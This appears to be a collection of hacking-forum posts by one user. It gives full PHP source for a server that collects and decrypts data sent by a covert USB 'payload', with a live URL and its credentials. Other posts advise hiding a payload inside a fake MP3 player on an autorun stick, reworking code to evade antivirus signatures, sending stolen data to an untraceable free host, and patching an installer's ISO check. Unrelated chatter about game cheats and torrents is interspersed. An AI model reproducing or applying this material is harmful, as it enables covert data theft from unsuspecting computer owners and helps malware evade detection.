name=Liz7783&log=.!HuMJUFQL@HPKBH.OJUFQL@[cut] Heres a picture of it, also with the nice little web front in the background I made for it to decode, decrypt and view the logs in the database... as you can see from this picture below of MySQL Query Browser, the data is encrypted in the database itself... If your wondering about the names, I like to name all my computers as well as log their IP, it just makes it easier for me... the software randomly chooses a name for the computer its run on Source Code + Binary http://popeax.com/sendmeyourpackets/SwiftSubmit.zip go ahead and test it out on my web server! I can kind of have my own little hak5 wall goin' lol! you can login to the webfront and see if anyone posted, or see if your post worked! http://popeax.com/sendmeyourpackets/viewlogs.php -> user: root, password: 1337 SOURCE: <?php include('config.php'); if(isset($_POST['auth'])) { $user = $_POST['user']; $pass = $_POST['pword']; $logininfo = "$user-$pass"; setcookie("chocolatechipcookie", $logininfo, time()+1200); // 1200 = 20 minutes echo "<meta http-equiv='refresh' content='0;url=$Self'>"; } if(isset($_COOKIE['chocolatechipcookie'])) // every time you refresh the page you'll stay logged in for 20 minutes { $logininfo = $_COOKIE['chocolatechipcookie']; setcookie("chocolatechipcookie", $logininfo, time()+1200); } ?> <html> <head> <title>Log Viewer v1.0 - by Steve8x</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <center> <?php //must change these to be secure so no one can read your logs but you $USER = "root"; $PASSWORD = "1337"; //very similar to my c++ version function XORbuffer($buffer, $password) { $passlength = strlen($password); $bufflength = strlen($buffer); $x = 0; for($i = 0; $i < $bufflength; $i++) { if($x == $passlength) { $x = 0; } $buffer[$i] = $buffer[$i] ^ $password[$x]; $x++; } return $buffer; } //if no cookie is set, then show the login page if(!isset($_COOKIE['chocolatechipcookie'])) { echo "<h1> Admin Login: </h1>"; echo "<p><form method='post' action='$Self'>"; echo "<table border='2' cellspacing='2' cellpadding='0'><tr>"; echo "<td>Username: </td><td> <input name='user' type='text' id='user'> </td> </tr>"; echo "<td>Password: </td><td> <input name='pword' type='password' id='pword'></td></tr> </table>"; echo "<p> <input type='submit' name='auth' id='auth' value='Login'>"; echo "</form>"; die(); } else { //otherwise validate the username and password stored in the cookie! $logininfo = $_COOKIE['chocolatechipcookie']; list($usr, $pass) = split('-', $logininfo); //If you enter the wrong username or password you'll have to clear your cookies in your browser //its made that way as an annoyance to deter someone from attempting to guess // HOWEVER they shouldn't know about your page anyway... if($usr != $USER) { die("<h1>INVALID CREDENTIALS!!! FUCK OFF!!</h1>"); } if($pass != $PASSWORD) { die("<h1>INVALID CREDENTIALS!!! FUCK OFF!!</h1>"); } echo "<form method=\"post\" action=\"$Self\">"; echo "<input type=\"submit\" name=\"save\" id=\"save\" value=\"Save Logs To File!\"><p>"; echo "</form>"; //lets fetch that data from the database! $query = "SELECT * FROM data"; $result = mysql_query($query); if(isset($_POST['save'])) { $savefile = 1; $file = fopen("savedlogs.txt", "w"); } echo "<table border='1' cellspacing='1' cellpadding='1'>"; echo "<tr><th>ID</th><th>Name</th><th>IP</th><th>LOG</th></tr>"; while($row = mysql_fetch_array($result)) { $id = $row[0]; $name = $row[1]; $ip = $row[2]; $log = $row[3]; //change the password "hak5liverocks" here and also in your c++ program //they have to match so that this page can properly decrypt the stored data //the data is always stored encrypted in the database... //its only decrypted when you want to view it! //or save it to a text file $decoded = urldecode($log); $decrypted = XORbuffer($decoded, "hak5liverocks"); if($savefile == 1) { $preparedstring = "name-> $name ip-> $ip log-> $decrypted\r\n"; fwrite($file, $preparedstring); } echo "<tr><td>"; echo "$id"; echo "</td><td>"; echo "$name"; echo "</td><td>"; echo "$ip"; echo "</td><td>"; echo "$decrypted"; echo "</td></tr"; } if($savefile == 1) fclose($file); echo "</table>"; } ?> http://popeax.com/sendmeyourpackets/index.php SOURCE: <?php include ('config.php'); if(isset($_POST['name'])) // these means our little program is sending us data :) { $ip = $_SERVER['REMOTE_ADDR']; $name = $_POST['name']; $log = $_POST['log']; $name = mysql_real_escape_string($name); $log = mysql_real_escape_string($log); //insert the encrypted + minimally encoded data into the database! $query = "INSERT INTO data (name, ip, log) VALUES ('$name', '$ip', '$log')"; mysql_query($query); } else // otherwise someones just looking at the page { echo "<center><h1>You Got PWNED!</h1><img src=\"pwned.jpg\"></center>"; } // the \" are to escape the quotes! in this case you could of also just used single quotes ' ' // but thats not always the case so its good to know how to escape characters! ?> config.php SOURCE: <?php $dbhost = 'localhost:3306'; $dbuser = 'nottellingyou'; $dbpass = 'hak5liverocks'; $dbname = 'collecteddata'; $Self = $_SERVER['PHP_SELF']; $conn = mysql_connect($dbhost, $dbuser, $dbpass) or die ('Error connecting to mysql'); $query = "CREATE DATABASE IF NOT EXISTS collecteddata"; // creates database for you if it doesnt exist yet $result = mysql_query($query); mysql_select_db($dbname); $query = "CREATE TABLE IF NOT EXISTS data(id INT NOT NULL AUTO_INCREMENT, name VARCHAR(30) NOT NULL, ip VARCHAR(30) NOT NULL, log VARCHAR(8000) NOT NULL, PRIMARY KEY(id))"; // create table if not existant mysql_query($query); ?> Oh and the XOR encryption used is slightly better than what ive shown before in other topics... instead of XORing EACH byte of the buffer with EACH character of the password. I only xor each SUCCESSIVE character of the buffer which each SUCCESSIVE character of the password. This makes it way more secure, the previous method reduced the 'password' to only 1 character, this now requires all characters of the password so the plain text can be revealed well what do you think should I keep the encryption? or just go with encoding? With the encryption not all characters seem to come out exactly the same as when posted, there's something not quite right... thats not a big deal for text data, but as you can imagine for binary data or something where every single byte has to be right or it'll be messed up, its a problem... So I'm a little confused on how to get this working 100% smooth. Should I encode then encrypt? or encrypt then encode? lol !!! right now its about 95% just gotta figure out fully the encoding bit, I probably have to encode more chars than just '&' and spaces... thats probably whats messing up some characters sometimes... I know one problem though that I dealt with the best I could the '&' signs... if you encrypt your data and one of those just so happens to be a resulting character after the encryption, that's going to mess up your posted data, it will stop right there, and no more data will be gotten for that field(because it thinks your declaring data for another field), like "name", "log", etc... well if anyone is good with encoding+encrypting together let me know, And this thing will have perfect 100% readability... If I removed the encryption and just used encoding all the characters would always be readable but I'd lose the little security provided by it... So I'd rather keep it and figure something out to where the encoding + encrypting can work together! :)

well im sure at least 1 of the creators of the u3 technology knew capacity of such a device and what it can do and that person helped bring it to life ;) maybe not all of U3 but "someone" was thrilled about the new device a CDROM drive that fits in your pocket :) Last time I tried the LP-installer from sandisk neither placing the iso in the same dir or spoofing the sandisk website to my localhost worked at flashing the cdrom partition... the first thing was taken out purposely as I've heard... The second thing to me appears like sandisk is not only not loading iso's from the directory of lpinstaller, but they are also doing a check on the ISO file it self... If it is not the ISO from sandisk, it gives you a b$ error message! So in order to use the lpinstaller, I'd think you'd have to hack it, find where in the program its checking the ISO file if its the one thats "supposed" to be flashed, instead of a custom one... If the program is packed though it will make it a bit harder... (i have almost no experience with unpacking personally) although you could just modifying its memory while its running if thats the case instead of patching the executable... basically it all comes down to a conditional jump somewhere along the lines... once you find it! it will accept your ISO as if it was from sandisk itself! cmp [eax+12], 01 jne InvalidISOGiveThisHackerTheErrorMessage jmp FlashISO lets say eax+12 is the memory location, the one which holds the value which decides whether the iso is valid or not either nop out the cmp and the jne or turn the jne into an unconditional jump for those not ASM minded, JNE means JUMP IF NOT EQUAL (conditional jump) JMP means ALWAYS JUMP (Unconditional jump) of course it could be setup differently than that! but you get the idea, it'll be something like that :) happy hunting Another option would probably to reverse engineer lpinstaller or universal customizer, and figure out how it flashes the cdrom partition, then you could make an updated version of UC which removes the problem of shrinkage ;)

*all the PUBLIC tools and payloads are detectable by almost any AV... because once the AV people get there hands on a "payload" they create little virus "signatures" i think they are called... which are just an array of byte codes which make up a program in a certain order... if an AV picks up a number of bytes arranged in the same order, as one of the virus signatures in there database, it flags the file as a virus/trojan/whatever usually with some b$ name that doesn't even make sense and is not what it is at all... There's been countless times when a non malicious file was flagged as malicious by my Anti-virus! its really annoying especially when you know its a clean file! just because the file contains similar bytes to that of a file someone made a virus out of!! You can still make whats detectable undetectable again! but you have to change the code around! sometimes alot! you need to make it so the arrangement of bytes that make up the program, aren't picked up by AV... AV's don't detect the method used to do something(at least not usually) they detect certain byte patterns... here's an example(note: this is just a random disassembled output taken from a random program) now lets say that block of code is in an AV database as part of a virus signature You can see the bytes to the left and the opcodes to the right... Now if you had the source code to this program, you'd locate where this is in your source code, and change the order of things, add in some new stuff, remove things, etc... make it look like a different program... In turn the order of these bytes will change around... I wouldn't recommend trying to make a program undetectable that you don't have the source code to as it would be a tedious job, unless the program was coded in ASM to begin with, then it would be more lightweight... obviously some of these codes have to be in the order that they are for things to work right, but you change what you can! OK. Here's a scenario! Lets say a program you've made which was once undetectable is now detectable by Anti-virus's because some jerk off coded a malicious program that has similar code to yours... What you do is you comment EVERYTHING out! comment all your code out and re-compile, now are you undetectable? you should be! If so continue! un-comment your code little by little, until you find out where in your code your being picked up by AV! once you find the problem area in your code, now you've spotted your problem. change it around, like I said before. Add new stuff, remove old stuff, change the order of things, until you are undetectable once again! :) trial and error... repeat until you are successfull! that is how you make programs undetectable

You can't clone an IP address... But you can use somebody elses ;)

what a minute? did you guys say your using a 644MB ISO image? and a 2.8GB iso? I thought the limitation with U3 is the ISO has to be 6.66MB or lesss SIX POINT SIX SIX MB. Not SIX hundred and sixty six. I don't think I'm wrong... maybe that is your problem? your ISO needs to be only 6.66MB at most... its not a big deal though as you could have what takes up space on the USB partition and have your 6.66mb iso read from that...

The best payload is one you have programmed yourself! Because you can customize it to do whatever you want, and it works exactly the way you want.... You really should get a U3 device so your "payload" runs automatically without user input... But if your too cheap to, then use some clever disguise ... like for example, make the program when the box pops up something that seems innocent... like don't have the popup say click to to install virus or something like that lol... instead maybe put some mp3's on your USB stick, disguise your payload installer within a mp3 player that you've made... when you run the mp3 player it plays the mp3's while in the background your payload is being installed.... and here's a special hint from me which I use, This is the best way I have thought of to receive whatever information your gathering from the computer... Setup a free website which offers PHP and MYSQL, create a mysql database... craft a php page so that when data is submitted to it it is stored into the database... now instead of having your payload EMAIL you have your payload SUBMIT the data to your php page! since the php page is server sided NOBODY can read the php code except you! Since its a free website with false information nothing can be traced back to you! if they try to download the php page, no they wont get php code, only the HTML code generated by it... which you can make blank, or have a little message saying "YOU GOT PWNED" thats my take on a good payload ;)

So fishmonger! you haven't let us know how it went yet? did it work? I've been waiting for an answer! let us know whats up :)

ahh, I remember harrison and his drunken talk on buffer overflows! haha lol that was a funny episode! mmmmmmmmm.... thats some good assembly code ;) lol

RougeHart, ya I'm definitely with you on that one!! Although I believe it was for PS2 wasn't it? or was it PS1? anyway I think I remember it blended in with the console, black (or maybe I'm wrong and it was PS1) well either way that was the best gameshark I ever used! even if hacks for the game you played didnt exist you could just press the button on the back and it would pause the game and you search for a value, and press it again to unpause it and keep going to you find the hack your looking for! ;) then you could save the found address onto the game shark it self! I also had one for dreamcast but it sucked, the cd-swapping crap! So yeah anyway gameshark pro for PS2/PS1 was my favorite console accessory. And for PC; CHEAT ENGINE! sorta like gameshark for the PC ;) I use cheat engine to find the hack addresses, then I could make a cool C++ or ASM trainer for the game!

lol this thread reminds of my friends computer... It has a touch screen where instead of using the mouse, you can just click things with your fingers on the screen... you could even using for drawing! by moving your finger around the screen... its really neat!! but theres on problem with it, when I was over there were some fly's flying around and you know how they are attracted to light right? well they kept flying into the screen and making the mouse click everywhere, and he was like working on something and the fly managed to click the X button lol it was pretty funny! There's gotta be a way to turn off the touch screen but I wasn't sure how, neither did my friend know! So thats one draw back of a touch screen a fly could mess shit up if your doing something on your computer... lol at first I thought it was a virus or something where it would move the mouse around and a little bug image would be drawn on the screen, and then he was like oh no its no virus dont worry its an ACTUAL BUG!

A non U3 device can never come a U3 device!!! U3 Technology has something at the hardware level which to windows appears as a CDROM drive.. So in other words, there's is nothing you can do with software to make it autorun! Your USB drive must have CDROM emulation in the hardware... So you'll have to get U3 drive if you want TRUE autorun capability for windows! So bottom line, don't buy it unless it says U3!

Well personally if/when I ever download files using torrents, after the download is done. I always make sure to leave it seed until I have at least a 1.0 ratio... I believe the ratio is how much you've downloaded compared to how much you have uploaded... So a 1.0 ratio means you have downloaded equally the same amount you have uploaded! So then I've done my part. I've downloaded the file from someone, and I uploaded the file to someone(in theory) really ive uploaded to many people and downloaded from many people... but the amount downloaded and uploaded equals 100% of the file... usually though I just leave it running for even longer so the ratio is alot higher(if im not really using the computer) Hit and runners are such asshats! lol... they just download the file and immediately stop seeding even before they begin!! There are private sites out there though where you are forced to seed if you want to download, they keep track of your ratio's and make a total ratio (i think) so the kind of software your talking about already exists and is in use! share a little, receive a little is the idea ;)

3GB flat? or 3.76GB? I've used the universal customizer on my 4GB cruzer micro, and it reads 3.76GB... I don't remember what it was before I flashed it with a custom ISO, but im pretty sure it was never 4GB total... all hard drives/flash drives are like that, they say a certain amount like 500GB but its actually a bit less than that like 465GB so compared with both the numbers I'd say you get about about 6-7% less space than what is advertised! Why is it like that? why do they say 500GB when its 465GB in reality? lol well anyway maybe the universal customizer messes up with cruzer's larger than 4 GIG?

here's my favorite question out of the test I scored 47 somewhat geeky ;)